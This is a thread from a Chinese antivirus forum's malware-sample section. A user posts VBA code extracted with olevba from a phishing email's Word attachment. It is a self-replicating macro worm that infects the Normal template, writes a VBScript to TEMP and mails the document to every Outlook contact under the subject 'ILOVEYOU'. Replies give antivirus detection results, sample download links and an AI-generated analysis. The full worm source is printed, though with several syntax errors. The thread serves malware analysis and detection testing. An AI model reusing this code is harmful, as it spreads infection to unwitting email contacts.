查看: 2064|回复: 13
收起左侧

[病毒样本] 宏病毒样本 1x

[复制链接]
python无名氏
发表于 2023-3-26 11:05:24 | 显示全部楼层 |阅读模式
本帖最后由 python无名氏 于 2023-3-26 12:33 编辑

一封钓鱼邮件来的,说什么从我账户里扣除了3000$用于购买母亲节钻石,要我看附件里的doc[过滤],笑死,我一分钱没有好久没有收到类似的钓鱼邮件了
下下来olevba了一下,根据感染标记,就姑且叫他PHMM吧!
VBA代码:

  1. 'PHMM
  2. Sub AutoOpen()
  3. On Error Resume Next
  4. Application.DisplayStatusBar = False
  5. Options.SaveNormalPrompt = False
  6. Ourcode = ThisDocument.VBProject.VBComponents(1).CodeMoudle.Lines(1, 100)
  7. Set Host = ActiveDocument.VBProject.VBComponents(1).CodeMoudle
  8. If ThisDocument = NormalTemplate Then
  9.     Set Host = ActiveDocument.VBProject.VBComponents(1).CodeMoudle
  10. End If
  11. With Host
  12.     If .Lines(1.1) <> "'PHMM" Then
  13.         .DeleteLines 1,  .CountOfLines
  14.         .InsertLines 1, Ourcode
  15.         .ReplaceLines 2, "Sub AutoClose()"
  16.         If ThisDocument = NormalTemplate Then
  17.             .ReplaceLines 2, "Sub AutoOpen()"
  18.             ActiveDocument.SaveAs ActiveDocument.FullName
  19.         End If
  20.     End If
  21. End With
  22. Open Environ("TEMP") & "" & "Sender.vbs" For Output Access Write As #1
  23. Print #1, "On Error Resume Next"
  24. Print #1, "dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad"
  25. Print #1, "set regedit=CreateObject" & Chr(40) & Chr(34) "WScript.Shell" & Chr(34) & ")"
  26. Print #1, "set out=WScript.CreateObject" & Chr(40) & Chr(34) & "Outlook.Application" & Chr(34) & Chr(41)"
  27. Print #1, "set mapi=out.GetNameSpace" & Chr(40) & Chr(34) & "MAPI" & Chr(34) & Chr(41)"
  28. Print #1, "for ctrlists=1 to mapi.AddressLists.Count"
  29. Print #1, "set a=mapi.AddressLists(ctrlists)"
  30. Print #1, "x=1"
  31. Print #1, "regv=regedit.RegRead(" & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&a)"
  32. Print #1, "if (regv="Chr(34) & Chr(34) & Chr(41) & " then"
  33. Print #1, "regv=1"
  34. Print #1, "end if"
  35. Print #1, "if (int(a.AddressEntries.Count)>int(regv)) then"
  36. Print #1, "for ctrentries=1 to a.AddressEntries.Count"
  37. Print #1, "malead=a.AddressEntries(x)"
  38. Print #1, "regad=" & Chr(34) & Chr(34)
  39. Print #1, "regad=regedit.RegRead(" & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&malead)"
  40. Print #1, "if (regad=" & Chr(34) & Chr(34) & Chr(41) & " then"
  41. Print #1, "set male=out.CreateItem(0)"
  42. Print #1, "male.Recipients.Add(malead)"
  43. Print #1, "male.Subject = " & Chr(34) & "ILOVEYOU" & Chr(34)
  44. Print #1, "male.Body = vbcrlf & " & Chr(34) & "Please look at the attachments!" & Chr(34)
  45. Print #1, "male.Attachments.Add" & Chr(40) & Chr(34) & ActiveDocument.FullName & Chr(34) & Chr(41)
  46. Print #1, "male.Send"
  47. Print #1, "regedit.RegWrite " & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&malead,1," & Chr(34) & "REG_DWORD" & Chr(34)"
  48. Print #1, "end if"
  49. Print #1, "x=x+1"
  50. Print #1, "next"
  51. Print #1, "regedit.RegWrite  "& Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&a,a.AddressEntries.Count"
  52. Print #1, "end if"
  53. Print #1, "regedit.RegWrite " & Chr(34) & "HKEY_CURRENT_USER\Software\Microsoft\WAB" & Chr(34) & "&a,a.AddressEntries.Count"
  54. Print #1, "next"
  55. Print #1, "Set out=Nothing"
  56. Print #1, "Set mapi=Nothing"
  57. Close #1
  58. Shell("wscript " & Environ("TEMP") & "" & "Sender.vbs")
  59. End Sub

复制代码

看微步分析出了loveletter,我也是醉了...
没有具体的什么恶意行为
样本微步链接(原样本被误删):https://s.threatbook.com/report/ ... baa81c7f0a5fbbd379b
(话说这个让人打开宏的把戏好劣质...)

luoying2334
发表于 2023-3-26 11:13:43 | 显示全部楼层
火绒 kill
dght432
发表于 2023-3-26 11:22:02 | 显示全部楼层
https://pan.huang1111.cn/s/GDm6iW

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
anthonyqian
发表于 2023-3-26 11:29:36 | 显示全部楼层
本帖最后由 anthonyqian 于 2023-3-26 18:06 编辑

诺顿missed
F-Secure 自己的引擎检测到 Trojan-Downloader:W97M/Neurevt.C
莒县小哥
发表于 2023-3-26 11:56:02 | 显示全部楼层
本帖最后由 莒县小哥 于 2023-3-26 12:46 编辑

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ANY.LNK
发表于 2023-3-26 12:14:28 | 显示全部楼层
微软机器学习击杀Trojan:O97M/Sadoca.C!ml
117054487
发表于 2023-3-26 12:17:59 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
SweetieRamRem
发表于 2023-3-26 12:26:09 | 显示全部楼层
GPT:“这段代码可能是一种恶意代码,因为它会尝试发送垃圾邮件并进行系统更改。

首先,该代码隐藏了状态栏并禁用了保存文件时的提示。这些操作可能会误导用户,导致用户不知道发生了什么,而在后续的操作中,该代码打开了一个 VB 脚本文件并编写了发送垃圾邮件的代码。该代码从 Outlook 应用程序中获取邮件地址,并发送带有恶意附件的邮件。
此外,该代码还会检查当前文档是否为 NormalTemplate,如果是,它会尝试将其保存到文件系统,可能会覆盖或破坏正常的文档。
因此,如果您不信任此代码的来源或目的,请不要运行它。建议使用杀毒软件或其他安全工具来检查和处理这段代码。”

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
jdsh
发表于 2023-3-26 12:54:32 | 显示全部楼层
智量

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
HJV
发表于 2023-3-26 13:18:35 | 显示全部楼层
火绒
killed
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-24 11:37 , Processed in 0.138136 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表